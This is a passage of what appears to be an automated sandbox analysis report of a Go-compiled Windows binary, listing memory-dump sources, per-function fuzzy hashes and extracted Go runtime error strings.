            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
            • API String ID: 0-2911004680
            • Opcode ID: 6516f59dfbb957763f000e8b3873e475ba2cca09d9756ec1964b5d1a60b639b3
            • Instruction ID: 7050b44d09bef27b334b3ec05e5622a3139d2e447944c8d347aaa54a2290cc5b
            • Opcode Fuzzy Hash: 6516f59dfbb957763f000e8b3873e475ba2cca09d9756ec1964b5d1a60b639b3
            • Instruction Fuzzy Hash: E6F1EF727167C4C6EA009B26E8043AAA667F345BD0F994136EF5E07795CFBCC942C704
            Function 00713BE0 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: p<q
            • API String ID: 0-4282485015
            • Opcode ID: 5b6e3a9a240539d537c2a085d1d9e8d495f0d5a10e3fa4c42e0c4642d4638f71
            • Instruction ID: 09f0cbc60b759d92359a4e0f5f1a66b88bf3c520f9ce366e425bf2174d56b4f7
            • Opcode Fuzzy Hash: 5b6e3a9a240539d537c2a085d1d9e8d495f0d5a10e3fa4c42e0c4642d4638f71
            • Instruction Fuzzy Hash: C6D16D72609B84C6CB64DB1AF4403AAB7A5F789BC0F548125EB8D57B99DF3CC991CB00
            Function 006BF8E0 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: ?n
            • API String ID: 0-903412113
            • Opcode ID: 8bd0f87e2c31123382c1ae66a9231554516443f584cf11c847138bf371a9b73c
            • Instruction ID: 59f56d32bfa9ad00362680db0eef1a2298dc1983a3eb7b0446dc3ec23d6171ad
            • Opcode Fuzzy Hash: 8bd0f87e2c31123382c1ae66a9231554516443f584cf11c847138bf371a9b73c
            • Instruction Fuzzy Hash: A1B1E3B2209B84C6DB15CB25E8503FAB766F786B94F149239DB8E137A5CF38D4C68700
            Function 006D0400 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
            Download Yara Rule
            Strings
            • runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinnin, xrefs: 006D07A5
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinnin
            • API String ID: 0-429552053
            • Opcode ID: 106dc608b671791086adf1341dbbad1751c92e4a24e460989c95b7ad19d5bdd4
            • Instruction ID: c9148bbde851b097ec7444dbb56a73e83e1493e2fedec204c54d5e51113d87f9
            • Opcode Fuzzy Hash: 106dc608b671791086adf1341dbbad1751c92e4a24e460989c95b7ad19d5bdd4
            • Instruction Fuzzy Hash: D9A15C76A08B84C2EA50CB56F54079EA766F389BD0F445122EF8D57B29CF38C992CB40
            Function 006B6220 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
            Download Yara Rule
            Strings
            • bulkBarrierPreWrite: unaligned argumentsrefill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs, xrefs: 006B65C7
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: bulkBarrierPreWrite: unaligned argumentsrefill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs
            • API String ID: 0-866072839
            • Opcode ID: 61b0212578c3420e32c0dc663150d2a47a8a4a4ddfa89765a3bf973248c8be79
            • Instruction ID: 376099dcc906c31af100faa97b4693814c9c57ad5f37055bedcf80d96e1e0774
            • Opcode Fuzzy Hash: 61b0212578c3420e32c0dc663150d2a47a8a4a4ddfa89765a3bf973248c8be79
            • Instruction Fuzzy Hash: 99918DF7715B9482DB508B56E4403EAA7A6F389FC0F589126EE8D57B28DF38C4E58700
            Function 006CF5E0 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
            Download Yara Rule
            Strings
            • bad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006CF8A7
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
